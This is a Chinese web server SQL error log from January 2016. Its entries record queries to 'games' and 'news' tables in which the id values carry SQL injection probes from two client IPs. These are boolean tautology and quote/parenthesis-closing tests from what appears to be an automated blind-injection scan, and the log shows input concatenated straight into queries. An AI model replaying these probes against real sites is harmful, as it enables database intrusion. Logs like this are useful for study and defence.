时间 :2016-01-26 01:59:15

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:16

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:16

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:16

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:17

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1 and(1=1)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:17

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1 and(1=1)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:17

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:18

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1 and(11=11)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:18

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1 and(11=11)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:18

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:18

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:19

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1 and(1=11)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:19

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1 and(1=11)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:19

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:19

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111 and(1=1)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111 and(1=1)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1' and '1'='1' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1' and '1'='1' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11 and(1=1)'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11 and(1=1)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11 and(1=1)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11 and(1=1)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11 and(1=1)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11 and(1=1)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111 and(11=11)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111 and(11=11)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:20

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1' and '11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:21

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1' and '11'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:21

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1' and '11'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:21

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11 and(11=11)'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:21

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11 and(11=11)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:21

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11 and(11=11)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:21

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:21

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11 and(1=11)'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11 and(1=11)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11 and(1=11)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111 and(1=11)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111 and(1=11)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1' and '1'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1' and '1'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11 and(11=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11 and(11=11)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11 and(11=11)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:22

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11 and(1=11)'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11 and(1=11)' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11 and(1=11)' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1)and(1=1' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1)and(1=1' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11' and '1'='1'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11' and '1'='1' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11' and '1'='1' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111' and '1'='1' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111' and '1'='1' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:23

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11' and '11'='11'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11' and '11'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11' and '11'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11' and '1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11' and '1'='1' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11' and '1'='1' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1)and(11=11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1)and(11=11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111' and '11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111' and '11'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111' and '11'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:24

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11' and '1'='11'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11' and '1'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11' and '1'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1)and(1=11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1)and(1=11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11' and '11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11' and '11'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11' and '11'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111' and '1'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111' and '1'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:25

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11' and '1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11' and '1'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11' and '1'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11)and(1=1'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11)and(1=1' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11)and(1=1' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1' and '%'='' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1' and '%'='' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111)and(1=1' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111)and(1=1' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:26

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:27

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1' and '11%'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:27

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1' and '11%'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:27

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11)and(11=11'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:27

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11)and(11=11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:27

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11)and(11=11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:27

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:27

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111)and(11=11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:27

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111)and(11=11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:27

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11)and(1=1'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:28

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11)and(1=1' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:28

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11)and(1=1' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:28

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11)and(1=11'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:28

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11)and(1=11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:28

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11)and(1=11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:28

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:28

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1' and '1%'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:28

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1' and '1%'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:28

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11)and(11=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:29

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11)and(11=11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:29

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11)and(11=11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:29

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:29

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111)and(1=11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:29

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111)and(1=11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:29

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11)and(1=11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:29

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11)and(1=11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:29

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11)and(1=11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:29

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11' and '%'=''
客户IP:111.74.215.70
时间 :2016-01-26 01:59:30

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11' and '%'='' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:30

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11' and '%'='' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:30

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:30

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111' and '%'='' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:30

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111' and '%'='' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:30

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11' and '%'=''
客户IP:111.74.215.73
时间 :2016-01-26 01:59:30

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11' and '%'='' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:30

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11' and '%'='' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:30

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11' and '11%'='11'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:31

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11' and '11%'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:31

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11' and '11%'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:31

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:31

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111' and '11%'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:31

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111' and '11%'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:31

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11' and '11%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11' and '11%'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11' and '11%'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11' and '1%'='11'
客户IP:111.74.215.70
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11' and '1%'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11' and '1%'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.70
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11' and '1%'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'11'='11' and '1%'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='111' and '1%'='11'
客户IP:111.74.215.73
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='111' and '1%'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='111' and '1%'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 01:59:32

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 02:08:58

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 02:08:58

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'1'='111'
客户IP:111.74.215.73
时间 :2016-01-26 02:09:00

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 02:09:00

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'+and+'11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 02:09:00

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 02:09:00

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'1'='111'
客户IP:111.74.215.73
时间 :2016-01-26 02:09:01

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10?kw=defaultValue;}'+and+'11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 02:09:03

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='1'
客户IP:111.74.215.73
时间 :2016-01-26 02:09:04

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='1' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:09:04

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='1' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:09:04

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'1'='11'
客户IP:111.74.215.73
时间 :2016-01-26 02:09:04

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'1'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:09:04

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid>'81'+and+'1'='11' and nstatus=1 order by nid asc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:09:04

错误SQL语句：
SELECT * FROM news  Where nid='81'+and+'11'='11'
客户IP:111.74.215.73
时间 :2016-01-26 02:09:04

错误SQL语句：
SELECT nid,ntitle FROM news  Where nid<'81'+and+'11'='11' and nstatus=1 order by nid desc limit 1
客户IP:111.74.215.73
时间 :2016-01-26 02:09:04

错误SQL语句：
